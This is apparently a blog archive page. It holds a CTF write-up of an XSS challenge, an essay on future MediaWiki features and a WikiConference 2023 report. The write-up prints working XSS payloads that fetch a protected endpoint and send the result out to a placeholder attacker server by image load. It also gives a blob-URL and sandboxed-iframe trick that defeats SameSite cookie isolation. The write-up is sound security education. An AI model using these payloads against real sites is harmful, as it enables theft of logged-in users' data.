Wednesday, February 21, 2024

LA CTF write up: ctf-wiki

Last weekend I participated in LA CTF 2024. This is how I solved one of the challenges: "ctf-wiki". It was solved by 38 teams and worth 483 points.

The challenge

The challenge was an XSS problem. You can view it at the LACTF github. We are given a website that you can log into. Once you log in, you can create and edit pages, including adding arbitrary HTML (The description parameter is output unescaped). There is also a /flag page which outputs a flag if you are logged in as the admin. Finally, there is an admin bot that you can give a URL to, which it will visit, while being logged in as the admin. There is a CSP policy, but it specifies img-src * which allows us to exfiltrate data in the file names of images we chose to load.

This is all a pretty standard setup for a CTF XSS challenge.

Normally you would solve a problem like this by injecting a script like this into one of the pages of the site:

<script>
fetch(
  'https://ctf-wiki.chall.lac.tf/flag',
  {method:'post'}
).then( t=>t.text() ).then( a => {
  b=new Image();
  b.src='https://MYWEBSERVERHERE/?flag='+encodeURI( a.substr( 0,50 ) );
} );
</script>

And convince the admin bot to visit the page this script has been injected into. Admin bot visits the page, executes script, loads the /flag endpoint, loads an image from my webserver with the flag in the URL (CSP was blocking cross-site fetch() but not cross-site image loads, so we exfiltrate using an image). I then check my apache access_log file, find the flag, easy-peasy.

However there is a catch.

The Twist

As I said before, there is a twist. You can only view pages on the site if logged out. Logged in users can edit pages but not view them
 
The admin bot is logged into the site as the admin (so it can read /flag). If we send the admin bot to the page with the injected script, it just sees the edit page. It does not execute the script.

We can work around this a few ways. Since SameSite=Lax cookies are being used, we could load the site in an <iframe> from a different domain. SameSite=Lax is a security measure that means cookies are only loaded on top-level GET navigations, but not when a website is loaded as a subresource from a different "site". Another way to force being logged out is to simply add a period to the end of the domain - e.g. http://ctf-wiki.chall.lac.tf./ . An obscure feature of DNS is that it can be configured to automatically add "search domains" at the end of a domain name. Adding a period to the end of the domain name turns off this rarely used feature. The end result is that ctf-wiki.chall.lac.tf. and ctf-wiki.chall.lac.tf are separate domain names that point to the same place. Web browsers consider them to be totally separate websites which have separate cookies.

Thus I can point the admin bot to http://ctf-wiki.chall.lac.tf. (Plain http not https since the certificate won't match), and it will execute the script I insert into the site. Unfortunately there is another problem. The admin bot won't be logged in when fetching http://ctf-wiki.chall.lac.tf./flag, and thus it cannot read the contents of http://ctf-wiki.chall.lac.tf/flag since that would be a cross-domain request, which is prevented by the same origin policy.

This is quite a catch-22. We can either be logged in, able to read the flag but not able to tell the browser to get it, or we can be logged out, be able to tell the browser to fetch but not be able to access the results. We need to be both logged in and logged out at the same time

Popup windows

The natural solution to this problem would be a pop-up window. You could open the page with an injected script in an <iframe>. SameSite=Lax cookies are not sent to cross-site iframes, so we would be logged out in the <iframe> and execute the script. The script could use window.open() to open a pop-up window. Pop-up windows are a top-level GET navigation, so SameSite=Lax cookies will be sent, and we will be logged-in inside the pop-up. Since both the iframe and the pop-up are the same domain, they are allowed to communicate with each other; window.open() returns a window object for the pop-up, which the iframe can use to run scripts in the context of the pop-up window.

There is only one problem - pop-up blockers. Modern browsers only allow pop-up windows if they are the result of a user action. Users have to click something. Scripts cannot create pop-up windows of their own volition.

It turns out that this is not entirely true for the contest.The admin bot had its pop-up blocker disabled, so I could have used pop up windows. However, at the time I simply tested with my local copy of chrome, saw it didn't work, and assumed the adminbot would be the same. An important lesson here: you should always test your assumptions. Nonetheless, lets pretend that wasn't the case, can we solve this problem without using pop-ups?

The challenge on hard mode: no pop-ups

Without pop-ups, we essentially only have <iframe>s and navigating the entire page. There are two browser features that present a challenge here:

  • SameSite=Lax cookies: This is designed so that no cookies are ever sent from requests originating cross-site except for top level GET navigations.
  • Cache partitioning - Browsers are becoming more and more concerned with user tracking. To combat this they have implemented cache partitioning. Essentially, caches are partitioned so that an <iframe> of some domain has a totally separate cache from a top level navigation to that domain. This includes APIs like ServiceWorkers that you might be able to use to control other pages on the same domain. It also includes cookies. The exact details of this varies between browsers.
This was looking pretty hopeless, after all the entire point of cache partitioning was to prevent communication between third-party iframes and their main site. I didn't just want to communicate from a third-party iframe to its originating site, I wanted to control the originating site from the third-party website, which seems much harder then mere communication. If there was a way to communicate, it would break the entire point of the cache partitioning feature.
 
After much googling, I eventually came across the google chrome privacy sandbox docs. It had the following enticing line:

A blob is an object that contains raw data to be processed, and a blob URL can be generated to access the resource. Blob URL stores are not partitioned. To support a use case for navigating in a top-level context to any blob URL (discussion), the blob URL store might be partitioned by the agent cluster instead of the top-level site. This feature is not be available for testing yet, and the partitioning mechanism may change in the future.

 

An exception to cache partioning! That sounds exactly like what I needed.

What is a blob url anyways?

A blob url is kind of like a fancy data: url. They are generally of the form blob:origin/UUID. For example: blob:http://example.com/1c18cbfc-cb5a-4709-9fd4-f50bb96ab7b7. They reference some bytes associated with a specific page, and generally only last so long as the page they are associated with exists. You can use them like data: urls, for example in the src attribute of an <img> tag. Unlike data urls, blob urls don't embed the data within themselves but just reference it with a UUID, which can be helpful for large files. Normally you create them with the URL.createObjectURL() javascript API, which takes a Blob object and outputs a blob url.

The exciting part is:
  • Unlike data: urls, Blob urls have the same origin as the page that creates them.
  • Blob urls are exempt (for the moment at least) from cache partioning and work across third-party contexts.
  • You can use blob urls to do top-level navigation. (data: urls have been banned from script based top level navigation)

Putting this altogether, we can create a blob url from inside an iframe containing HTML of our choosing, navigate the entire page to the blob url with our HTML, which then executes as if it was top level. This means that it can send SameSite cookies as well as being considered in the same cache partition as the main site (unlike the <iframe>). Hence we are logged in, inside this blob: url.

Putting it all together

To pull this off, we'll have two pages on the ctf-wiki, the actual script and an iframe wrapper.

The iframe wrapper simply looks like this. We would visit it from the extra dot url to be logged out:

 <iframe src="https://ctf-wiki.chall.lac.tf/view/4568f3f843562569a487b3ee9fb22dcf"></iframe>

The page it wraps is the interesting one:

<script>
 parent.location = URL.createObjectURL(
    new Blob( [
      "<script>" +
      "fetch('https://ctf-wiki.chall.lac.tf/flag',{method:'post'})" +
        ".then(t=>t.text())" +
        ".then(flag => { " +
            "var img = new Image();" +
            "img.src = 'https://MYWEBSITEHERE/?flag='+encodeURI(flag.substr(0,50))" + 
         "});" +
       "\x3C/script\x3E"
    ], 
    {type: "text/html"}
    )
 )
</script>

This script creates a blob url. The blob url contains an HTML page with a script that fetches the flag and exfiltrates it to my server. It then navigates the parent window (i.e. Not the <iframe> we are inside, but the page containing it) to this blob url. The blob url will then execute in a top level context with the same origin as the <iframe>. It will fetch the flag, and then send that value to my server as an image load request.

So I tried it. It didn't work :(

Looking at the browser console, I had an error saying iframes are not allowed to navigate the top window without the user clicking on something. At first, i thought the approach was dead, but then I remembered that the sandbox attribute for <iframe>s had something related to this.

Normally the sandbox attribute just takes away rights relative to being unspecified; it doesn't add any rights. However, the docs mentioned both a allow-top-navigation and a allow-top-navigation-by-user-activation sandbox keyword. The later being the behaviour I seemed to be getting with no sandbox attribute and the former being the behaviour I wanted. It didn't seem like there would be much point in including allow-top-navigation, if it was never allowed, so I thought I would try it and see what happened. I changed my iframe to be
 
<iframe src="https://ctf-wiki.chall.lac.tf/view/4568f3f843562569a487b3ee9fb22dcf" sandbox="allow-top-navigation allow-scripts allow-same-origin"></iframe>

Then I visited the page with that iframe: http://ctf-wiki.chall.lac.tf./view/ea313ff4550b824368d39e00936ef58d (Note the dot after the tf TLD, to ensure no cookies are sent so we are logged out. We need this page to be on the weird domain in order to prevent cookies to show our XSS. We need the iframe to frame the real domain. It also won't send cookies since it is a cross-domain iframe, but it needs to be the real domain since the blob inherits its origin and we want the blob to be the real domain).

And it worked!

The page with the iframe loaded the second page inside the iframe. That page was cookie-less, but created the blob url with the second stage script. It navigated the top window to the blob script, which was now running at the top level, so all the fetch() requests it makes have the appropriate cookies. It fetched the flag, and then sends the flag to my website as part of the name of a fake "image" file. I can then see the flag in my apache access log.
 
107.178.207.72 - - [18/Feb/2024:04:43:45 +0000] "GET /?flag=lactf%7Bk4NT_k33P_4lL_my_F4v0r1T3_ctF3RS_S4m3_S1t3%7D HTTP/1.1" 200 3754 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/121.0.0.0 Safari/537.36"
 
Thus the flag is: lactf{k4NT_k33P_4lL_my_F4v0r1T3_ctF3RS_S4m3_S1t3}
 

Conclusion

It is indeed possible to pivot from an XSS in an iframe, to an XSS that can read data that is partitioned to the main site, without using a pop-up. Of course the situation of having an XSS when not logged in but no XSS when actually logged in is pretty contrived. I do wonder if there are situations in the real world where using blobs to bypass SameSite cookies is applicable. I find it hard to imagine - an XSS attack is usually powerful enough to make things game over. It would be unusual that you couldn't leverage that directly.
 
The most realistic scenario i could think of where this blob behaviour might be useful, would be to bypass break out of credentialless iframes. Credentialless iframes are used for cross-origin isolated contexts (When you want your website to not be in the same process site of any other website, in order to prevent speculative exectution type attacks) and are not allowed to have references to window objects of pop-ups. Thus the usual attacks with pop-ups cannot be done. However the blob: url method can still work to turn an XSS in a credentialess context to one that can make credentialed requests.

Anyways. It is quite weird that blobs are exempt from cache partitioning. I wonder how long that will last.



Wednesday, January 10, 2024

Imagining Future MediaWiki

 As we roll into 2024, I thought I'd do something a little different on this blog.

A common product vision exercise is to ask someone, imagine it is 20 years from now, what would the product look like? What missing features would it have? What small (or large) annoyances would it no longer have?

I wanted to do that exercise with MediaWiki. Sometimes it feels like MediaWiki is a little static. Most of the core ideas were implemented a long time ago. Sure there is a constant stream of improvements, some quite important, but the core product has been fixed for quite some time now. People largely interact with MediaWiki the same way they always have. When I think of new fundamental features to MediaWiki, I think of things like Echo, Lua and VisualEditor, which can hardly be considered new at this point (In fairness, maybe DiscussionTools should count as a new fundamental feature, which is quite recent). Alternatively, I might think of things that are on the edges. Wikidata is a pretty big shift, but its a separate thing from the main experience and also over a decade old at this point.

I thought it would be fun to brainstorm some crazy ideas for new features of MediaWiki, primarily in the context of large sites like Wikipedia. I'd love to hear feedback on if these ideas are just so crazy they might work, or just crazy. Hopefully it inspires others to come up with their own crazy ideas.

What is MediaWiki to me?

Before I start, I suppose I should talk about what I think the goals of the MediaWiki platform is. What is the value that should be provided by MediaWiki as a product, particularly in the context of Wikimedia-type projects?

Often I hear Wikipedia described as a top 10 document hosting website combined with a medium scale social network. While I think there is some truth to that, I would divide it differently.

I see MediaWiki as aiming to serve 4 separate goals:

  • A document authoring platform
  • A document viewing platform (i.e. Some people just want to read the articles).
  • A community management tool
  • A tool to collect and disseminate knowledge

The first two are pretty obvious. MediaWiki has to support writing Wikipedia articles. MediaWiki has to support people reading Wikipedia articles. While I often think the difference between readers and editors is overstated (or perhaps counter-productive as hiding editing features from readers reduces our recruitment pool), it is true they are different audiences with different needs.

What I think is a bit under-appreciated sometimes but just as important, is that MediaWiki is not just about creating individual articles, it is about creating a place where a community of people dedicated to writing articles can thrive. This doesn't just happen at the scale of tens of thousands of people, all sorts of processes and bureaucracy is needed for such a large group to effectively work together. While not all of that is in MediaWiki, the bulk of it is.

One of my favourite things about the wiki-world, is it is a socio-technical system. The software does not prescribe specific ways of working, but gives users the tools to create community processes themselves. I think this is one of our biggest strengths, which we must not lose sight of. However we also shouldn't totally ignore this sector and assume the community is fine on its own - we should still be on the look out for better tools to allow the community to make better processes.

Last of all, MediaWiki aims to be a tool to aid in the collection and dissemination of knowledge¹. Wikimedia's mission statement is: "Imagine a world in which every single human being can freely share in the sum of all knowledge." No one site can do that alone, not even Wikipedia. We should aim to make it easy to transfer content between sites. If a 10 billion page treatise on Pokemon is inappropriate for Wikipedia, it should be easy for an interested party to set up there own site that can house knowledge that does not fit in existing sites. We should aim to empower people to do their own thing if Wikimedia is not the right venue. We do not have a monopoly on knowledge nor should we.

As anyone who has ever tried to copy a template from Wikipedia can tell you, making forks or splits from Wikipedia is easy in theory but hard in practice. In many ways I feel this is the area where we have most failed to meet the potential of MediaWiki.

With that in mind, here are my ideas for new fundamental features in MediaWiki:

As a document authoring/viewing platform

Interactivity

Detractors of Wikipedia have often criticized how text based it is. While there are certainly plenty of pictures to illustrate, Wikipedia has typically been pretty limited when it comes to more complex multimedia. This is especially true of interactive multimedia. While I don't have first hand experience, in the early days it was often negatively compared to Microsoft Encarta on that front.

We do have certain types of interactive content, such as videos, slippy maps and 3D models, but we don't really have any options for truly interactive content. For example, physics concepts might be better illustrated with "interactive" experiments, e.g. where you can push a pendulum with a mouse and watch what happens.

One of my favourite illustrations on the web is this one of an Enigma machine. The Enigma machine for those not familiar was a mechanical device used in world war 2 to encrypt secret messages. The interactive illustration shows how an inputted message goes through various wires and rotates various disks to give the scrambled output. I think this illustrates what an Enigma machine fundamentally is better than any static picture or even video would ever be able to.

Right now there are no satisfactory solutions on Wikipedia to make this kind of content. There was a previous effort to do something in the vein of interactive content in the graph extension, which allowed using the Vega domain specific language to make interactive graphs. I've previously wrote on how I think that was a good effort but ultimately missed the mark. In short, I believe it was too high level which caused it to lack the flexibility neccessarily to meet the needs of users, while also being difficult to build simplifying abstractions overtop.

I am a big believer that instead of making complicated projects that prescribe certain ways of doing things, it is better to make simpler, lower level tools that can be combined together in complex ways, as well as abstracted over so that users can make simple interfaces (Essentially the unix philosophy). On Wiki, I think this has been borne out by the success of using Lua scripting in templates. Lua is low level (relative to other wiki interfaces), but the users were able to use that to accomplish their goals without MediaWiki developers having to think about every possible thing they might want to do. Users were than able to make abstractions that hid the low level details in every day use.

To that end, what I'd like to see, is to extend Lua to the client side. Allow special lua interfaces that allow calling other lua functions on the client side (run by JS), in order to make parts of the wiki page scriptable while being viewed instead of just while being generated.

I did make some early proof-of-concepts in this direction, see https://bawolff.net/monstranto/index.php/Main_Page for a Demo of Extension:Monstranto. See also a longer piece I wrote, as well as an essay by Yurik on the subject I found inspiring.

Mobile editing

This is one where I don't really know what the answer is, but if I imagine MW in 20 years, I certainly hope this is better.

Its not just MediaWiki, I don't think any website really has authoring long text documents on mobile figured out.

That said, I have seen some interesting ideas around, that I think are worth exploring (None of these are my own ideas)

Paragraph or sentence level editing

This idea was originally proposed about 13 years ago by Jan Paul Posma. In fact, he write a whole bachelor's thesis on it.

In essence, Mobile gets more frustrating the longer the text you are editing is. MediaWiki often works on editing at the granularity of a section, but what about editing at the granularity of a paragraph or a sentence instead? Especially if you just want to fix a typo on mobile, I feel it would be much easier if you could just hit the edit button on a sentence instead of the entire section.

Even better, I suspect that parsoid makes this a lot easier to implement now than it would have been back in the day.

Better text editing UI (e.g. Eloquent)

A while ago I was linked to a very interesting article by Scott Jenson about the problems with text editing on mobile. I think he articulated the reasons it is frustrating very well, and also proposed a better UI which he called Eloquent. I highly recommend reading the article and seeing if it makes sense to you.

In many ways, we can't really do this, as this is an android level UI not something we control in the web app. Even if we did manage to make it in a web app somehow, it would probably be a hard sell to ordinary users not used to the new UI. Nonetheless, I think it would be incredibly beneficial to experiment with alternate UIs like these, and see how far we can get. The world is increasingly going mobile, and Wikipedia is increasingly getting left behind.

Alternative editing interfaces (e.g. voice)

Maybe traditional text editing is not the way of the future. Can we do something with voice control?

It seems like voice controlled IDEs are increasingly becoming a thing. For example, here is a blog post about someone who programs with a voice programming software called Talon. It seems like there are a couple other options out there. I see Serenade mentioned quite a bit.

A project in this space that looks especially interesting is cursorless. The demo looked really cool, and i could imagine that a power user would find it easier to use a system like this to edit large blobs of WikiText than the normal text editing interface on mobile. Anyways, i reccomend watching the demo video to see what you think.

All this is to say, I think we should look really hard at the possibilities in this space for editing MediaWiki from a phone. On screen keyboards are always going to suck, might as well look to other options.

As a community building platform

Extensibility

I think it would be really cool if we had "lua" extensions. Instead of normal php extensions, a user would be able to register/upload some lua code, that gets subscribed to hooks, and do stuff. In this vision, these extension types would not be able to do anything unsafe like raw html, but would be able to do all sorts of stuff that users normally use javascript for.

This could be per user or also global. Perhaps could be integrated with a permission system to control what they can and cannot do.

I'd also like to see a super stable API abstraction layer for these (and normal extensions). Right now our extension API is fairly unstable. I would love to see a simple abstraction layer with hard stability guarantees. It wouldn't replace the normal API entirely, but would allow simpler extensions to be written in such a way that they retain stability in the long term.

Workflows

I think we could do more to support user-created workflows. The Wiki is full of user created workflows and processes. Some are quite complex others simple. For example nominating an article for deletion or !voting in an RFC.

Sometimes the more complicated ones get turned into javascript wizards, but i think that's the wrong approach. As I side earlier, I am a fan of simpler tools that can be used by ordinary users, not complex tools that do a specific task but can only be edited by developers and exist "outside" the wiki.

There's already an extension in this area (not used by Wikimedia) called PageForms. This is in the vein of what I am imagining, but I think still too heavy. Another option in this space is the PageProperties extension which also doesn't really do what I am thinking of.

What I would really want to see is an extension of the existing InputBox/preload feature.

As it stands right now, when starting a new page or section, you can give a url parameter to preload some text as well as parameters to that text to replace $1 markers.

We also have the InputBox extension to provide a text box where you can put in the name of an article to create with specific text pre-loaded.

I'd like to extend this idea, to allow users to add arbitrary widgets² (form elements) to a page, and bind those widgets to specific parameters to be preloaded.

If further processing or complex logic is needed, perhaps an option to allow the new preloaded text to be pre-processed by a lua module. This would allow complex logic in how the page is edited based on the user's inputs. If there is one theme in this blog post, it is I wish lua could be used for more things on wiki.

I still imagine the user would be presented with a diff view and have to press save, in order to prevent shenanigans where users are tricked into doing something they don't intend to.

I believe this is a very light-weight solution that also gives the community a lot of flexibility to create custom workflows in the wiki that are simple for editors to participate in.

Querying, reporting and custom metadata

This is the big controversial one.

I believe that there should be a way for users to attach custom metadata to pages and do complex queries over that metadata (including aggregation). This is important both for organizing articles as well as organizing behind the scenes workflows.

In the broader MediaWiki ecosystem, this is usually provided by either the SemanticMediaWiki or Cargo extensions. Often in third party wikis this is considered MediaWiki's killer feature. People use them to create complex workflows including things like task trackers. In essence it turns MediaWiki into a no-code/low-code user programmable workflow designer.

Unfortunately, these extensions all scale poorly, preventing their use on Wikimedia. Essentially I dream of seeing the features provided by these extensions on Wikipedia.

The existing approaches are as follows:

  • Vanilla MediaWiki: Category pages, and some query pages.
    • This is extremely limited. Category pages allow an alphabetical list. Query pages allow some limited pre-defined maintenance lists like list of double redirects or longest articles. Despite these limitations, Wikipedia makes great use out of categories.
  • Vanilla mediawiki + bots:
    • This is essentially Wikipedia's approach to solving this problems. Have programs do queries offsite and put the results on a page. I find this to be a really unsatisfying solution. A Wikipedian once told me that every bot is just a hacky workaround to MediaWiki failing to meet its users' needs, and I tend to agree. Less ideologically, the main issue here is its very brittle - when bots break often nobody knows who has access to the code or how it can be fixed. Additionally, they often have significant latency for updates (If they run once a week, then the latency is 7 days) and ordinary users are not really empowered to create their own queries.
  • Wikidata (including the WDQS SPARQL endpoint)
    • Wikidata is adjacent to this problem, but not quite trying to solve it. It is more meant as a central clearinghouse for facts, not a way to do querying inside Wikipedia. That said Wikidata does have very powerful query features in the form of SPARQL. Sometimes these are copied into Wikipedia via bots. SPARQL of course has difficult to quantify performance characteristics that make it unsuitable for direct embedding into Wikipedia articles in the MediaWiki architecture. Perhaps it could be iframed, but that is far from being a full solution.
  • SemanticMediaWiki
    •  This allows adding Semantic annotations to articles (i.e. Subject-verb-object type relations). It then allows querying using a custom semantic query language. The complexity of the query language make performance hard to reason about and it often scales poorly.
  • Cargo
    • This is very similar to SemanticMediaWiki, except it uses a relational paradigm instead of a semantic paradigm. Essentially users can define DB tables. Typically the workflow is template based, where a template is attached to a table, and specific parameters to the template are populated into the database. Users can then use (Sanitized) SQL queries to query these tables. The system uses an indexing strategy of adding one index for every attribute in the relation.
  • DPL
    • DPL is an extension to do complex querying and display using MediaWiki's built in metadata like categories. There are many different versions of this extension, but all of them have potential queries that scale linearly with the number of pages in the database, and sometimes even worse.

I believe none of these approaches really work for Wikipedia. They either do not support complex queries or allow too complex queries with unpredictable performance. I think the requirements are as follows:

  • Good read scalability (By read, I mean scalability when generating pages (during "parse" in mediawiki speak). On Wikipedia, pages are read and regenerated a lot more often than they are edited.
    • We want any sort of queries to have very low read latency. Having long pauses waiting for I/O during page parsing is bad in the MediaWiki architecture
    • Queries should scale consistetly. They should at worse be roughly O(log n) in the number of pages on the wiki. If using a relational style database, we would want the number of rows the DBMS have to look at be no more than a fixed max number
  • Eventual write consistency
    • It is ok if it takes a few minutes for things using the custom metadata to update after it is written. Templates already have a delay for updating.
    • That said, it should still be relatively quick. On the order of minutes ideally. If it takes a day or scales badly in terms of the size of the database, that would also be unacceptable.
    • write performance does not have to scale quite as well as read performance, but should still scale reasonably well. 
  • Predictable performance.
    • Users should not be able to do anything that negatively impacts site performance
    • Users should not have to be an expert (or have any knowledge) in DB performance or SQL optimization.
    • Limits should be predictable. Timeouts suck, they can vary depending on how much load the site is under and other factors. Queries should either work or not work. Their validity should not be run-time dependent. It should be obvious to the user if their query is an acceptable query before they try and run it. There should be clear rules about what the limits of the system are.
  • Results should be usable for futher processing
    • e.g. You should be able to use the result inside a lua module and format it in arbitrary ways
  • [Ideally] Able to be isolated from the main database, shardable, etc.
  • Be able to query for a specific page, a range of pages, or aggregates of pages (e.g. Count how many pages are in a range, average of some property, etc)
    • Essentially we want just enough complexity to do interesting user defined queries, but not enough that the user is able to take any action that affects performance.
    • There are some other query types that are more obscure but maybe harder. For example geographic related queries. I don't think we need to support that.
    • Intersection queries are an interesting case, as they are often useful on wiki. Ideally we would support that too.

 

Given these constraints I think the CouchDB model might be the best match for on-wiki querying and reporting.

Much of the CouchDB marketing material is aimed around their local data eventual consistency replication story. Which is cool and all but not what I'm interested in here. A good starting point for how their data model works is their documentation on views. To be clear, I'm not neccesarily suggesting using CouchDB, just that its data model seems like a good match to the requirements.

CouchDB is essentially a document database based around the ideas of map-reduce. You can make views which are similar to an index on a virtual column in mysql. You can also make reduce functions which calculate some function over the view. The interesting part is that the reduce function is indexed in a tree fashion, so you can efficiently get the value of the function applied to any contiguous range of the rows in logrithmic time. This allows computing aggregations of the data very efficiently. Essentially all the read queries are very efficient. Potentially write queries can be less so but it is easy to build controls around that. Creating or editing reduce functions is expensive because it requires regenerating the index, but that is expected to be a rare operation and users can be informed that results may be unreliable until it completes.

In short, the way the CouchDB data model works as applied to MediaWiki could be as follows:

  • There is an emit( relationName, key, data) function added to lua. In many ways this is very similar to adding a page to a category named relationName with a sortkey specificed by key. data is optional extra data associated with this item. For performance reason, there may be a (high) limit to the max number of emit() on a page to prevent DB size from exploding.
  • Lua gets a function query( relationName, startKey, endKey ). This returns all pages between startKey and endKey and their associated data. If there are more than X (e.g. 200) number of pages, only return the first X.
  • Lua gets a queryReduced( relationName, reducerName, startKey, endKey ) which returns the reduction function over the specified range. (Main limitation here is the reduce function output must be small in size in order to make this efficient)
  • A way is added to associate a lua module as a reduce function. Adding or modifying these functions is potentially an expensive operation. However it is probably acceptable to the user that this takes some time

All the query types here are efficient. It is not as powerful as arbitrary SQL or semantic queries, but it is still quite powerful. It allows computing fairly arbitrary aggregation queries as well as returning results in a user-specified order. The main slow parts is when a reduction function is edited or added, which is similar to how a template used on very many pages can take a while to update. Emiting a new item may also be a little slower than reading since the reducers have to be updated up the tree (With possibly contention on the root node), however that is a much rarer operation, and users would likely see it as similar to current delays in updating templates.

I suspect such a system could also potentially support intersection queries with reasonable efficiency subject to a bunch of limitations.

All performance limitations are pretty easy for the user to understand. There is some max number of items that can be emit() from a page to prevent someone from emit()ing 1000 things per page. There is a max number of results that can be returned from a query to prevent querying the entire database, and a max number of queries allowed to be made from a page. The queries involve reading a limited number of rows, often sequential. The system could probably be sharded pretty easily if a lot of data ends up in the database.

I really do think this sort of query model provides the sweet spot of complex querying but predictable good performance and would be ideal for a MediaWiki site running at scale that wanted SMW style features.

As a knowledge collection tool

Wikipedia can't do everything. One thing I'd love to see is better integration between different MediaWiki servers to allow people to go to different places if their content doesn't fit in Wikipedia.

Template Modularity/packaging

Anyone who has ever tried to use Wikipedia templates on another wiki knows it is a painful process. Trying to find all the dependencies is a complex process, not to mention if it relies on WikiData or JsonConfig (Commons data: namespace)

The templates on a Wiki are not just user content, but complex technical systems. I wish we had a better systems for packaging and distributing them.

Even within the Wikimedia movement, there is often a call for global templates. A good idea certainly, but would be less critical if templates could be bundled up and shared. Even still, having distinct boundries around templates would probably make global templates easier than the current mess of dependencies.

I should note, that there are extensions already in this vein. For example Extension:Page_import and Extension:Data_transfer. All of them are nice and all, but I think it would maybe be cooler to have the concept of discrete template/module units on wiki, so that different components are organized together in a way that is easier to follow.

Easy forking

Freedom to fork is the freedom from which all others flow. In addition to providing an avenue for people who disagree with the status quo a way to do their own thing, easy forking/mirroring is critical when censorship is at play and people want to mirror Wikipedia somewhere we cannot normally reach. However running a wiki the size of english wikipedia is quite hard, even if you don't have any traffic. Simply importing an xml dump into a mysql DB can be a struggle at the sizes we are talking about.

I think it would be cool if we made ready to go sqlite db dumps. Perhaps possibly packaged as a phar archive with MediaWiki, so you could essentially just download a huge 100 GB file, plop it somewhere, and have a mirror/fork

Even better if it could integrate with EventStream to automatically keep things up to date.

Conclusion

So those are my crazy ideas for what I think is missing in MediaWiki (With an emphasis on the Wikipedia usecase and not the third party use-case). Agree? Disagree? Hate it? I'd love to know. Maybe you have your own crazy ideas. You should post them, after all, your crazy idea cannot become reality if you keep it to yourself!

Notes:

¹ I left out "Free", because as much as I believe in "Free Culture" I believe the free part is Wikimedia's mission but not MediaWiki's.

² To clarify, by widgets i mean buttons and text boxes. I do not mean widgets in the sense of the MediaWiki extension named "Widgets".

Tuesday, November 14, 2023

WikiConference North America 2023 (part 1)

 


 This weekend I attended WikiConference North America. I decided to go somewhat at the last moment, but am really glad I did. This is the first non-technical Wikimedia community conference I have attended since COVID and it was great to hear what the Wikipedia community has been up to.

I was on a bit of a budget, so i decided to get a cheaper hotel that was about an hour away by public transit from the venue. I don't think I'll do that again. Getting back and forth was really smooth - Toronto has great transit. However it meant an extra hour at the end of the day to get back, and waking up an hour earlier to get there on time, which really added up. By the end I was pretty tired and much rather would have had an extra 2 hours of sleep (or an extra 2 hours chatting with people).

Compared to previous iterations of this conference, there was a much heavier focus on on-wiki governance, power users and "lower-case s" Wikipedia (not Wikimedia) strategy. I found this quite refreshing and interesting since I mostly do MediaWiki dev stuff and do not hear about the internal workings of Wikipedia as much. Previous versions of this conference focused too much (imho) on talks about outreach which while important were often a bit repetitive. The different focus was much more interesting to me.

Key Take-aways

My key take away from this conference was that there is a lot of nervousness about the future. Especially:

  • Wikipedia's power-user demographics curve is shifting in a concerning way. Particularly around admin promotion.
  • AI is changing the way we consume knowledge, potentially cutting Wikipedia out, and this is scary
  • A fear that the world is not as it once was and the conditions that created Wikipedia are no longer present. As they keynote speaker Selena Deckelmann phrased it, "Is Wikipedia a one-generation marvel?"

However I don't want to overstate this. Its unclear to me how pervasive this view is. Lots of presenters presented views of that form, but does the average Wikipedian agree? If so, is it more an intellectual agreement, or are people actually nervous? I am unsure. My read on it is that people were vaguely nervous about these things, but by no means was anyone panicking about them. Honestly though, I don't really know. However, I think some of these concerns are undercut by there being a long history of people worried about similar things and yet Wikipedia has endured. Before admin demographics people were panicking about new user retention. Before AI changing the way we consume content, it was mobile (A threat which I think is actually a much bigger deal).

Admin demographics

That said, I never quite realized the scale of admin demographic crisis. People always talk about there being less admin promotions now than in the past, but i did not realize until it was pointed out that it is not just a little bit less but allegedly 50 times less. There is no doubt that a good portion of the admin base are people who started a decade (or 2) ago, and new user admins are fewer and further between.

A particular thing that struck me as related to this at the conference, is how the definition of "young" Wikipedian seems to be getting older. Occasionally I would hear people talk about someone who is in high school as being a young Wikipedian, with the implication that this is somewhat unusual. However when you talk to people who have been Wikipedians for a long time, often they say they were teenagers when they started. It seems like Wikipedians being teenagers was a really common thing early in the project, but is now becoming more rare.

Ultimately though, I suspect the problem will solve itself with time. As more and more admins retire as time goes on, eventually work load on the remaining will increase until the mop will be handed out more readily out of necessity. I can't help but be reminded of all the panic over new user retention, until eventually people basically decided that it didn't really matter.

AI

As far as AI goes, hating AI seems to be a little bit of a fad right now. I generally think it is overblown. In the Wikipedia context, this seems to come down to three things:

  • Deepfakes and other media manipulation to make it harder to have reliable sources (Mis/Dis-information)
  • Using AI to generate articles that get posted, but perhaps are not properly fact checked or otherwise poor quality in ways that aren't immediately obvious or in ways existing community practice is not as of yet well prepared to handle
  • Voice assistants (alexa), LLMs (ChatGPT) and other knowledge distributions methods that use Wikipedia data but cut Wikipedia out of the loop. (A continuation of the concern that started with google knowledge graph)

I think by and large it is the third point that was the most concerning to people at the conference although all 3 were discussed at various points. The third point is also unique to Wikipedia.

There seemed to be two causes of concern for the third point. First there was worry over lack of attribution and a feeling that large silicon valley companies are exploitatively profiting off the labor of Wikipedians. Second there is concern that by Wikipedia being cut out of the loop we lose the ability to recruit people when there is no edit button and maybe even lose brand awareness. While totally unstated, I imagine the inability to show fundraising banners to users consuming via such systems probably is on the mind of the fundraising department of WMF.

My initial reaction to this is probably one of disagreement with the underlying moral basis. The goal was always to collect the world's knowledge for others to freely use. The free knowledge movement literally has free in the name. The knowledge has been collected and now other people are using it in interesting, useful and unexpected ways. Who are we to tell people what they can and cannot do with it?

This is the sort of statement that is very ideologically based. People come to Wikimedia for a variety of reasons, we are not a monolith. I imagine that people probably either agree with this view or disagree with it, and no amount of argument is going to change anyone's mind about it. Of course a major sticking point here is arguably ChatGPT is not complying with our license and lack of attribution is a reasonable concern.

The more pragmatic concerns are interesting though. The project needs new blood to continue over the long term, and if we are cut out of the distribution loop, how do we recruit. I honestly don't know, but I'd like to see actual data confirming the threat before I get too worried.

The reason I say that, is that I don't think voice assistants and LLMs are going to replace Wikipedia. They may replace Wikipedia for certain use cases but not all use cases, and especially not the use case that our recruitment base is.

Voice assistants generally are good for quick fact questions. "Who is the prime minister of Canada?" type questions. The type of stuff that has a one sentence answer and is probably stored on Wikidata. LLMs are somewhat longer form, but still best for information that can be summarized in a few paragraphs, maybe a page at most and has a relatively objective "right" answer (From what I hear. I haven't actually used ChatGPT). Complex nuanced topics are not well served by these systems. Want to know the historical context that lead to the current flare up in the middle east? I don't think LLMs will give you what you want.

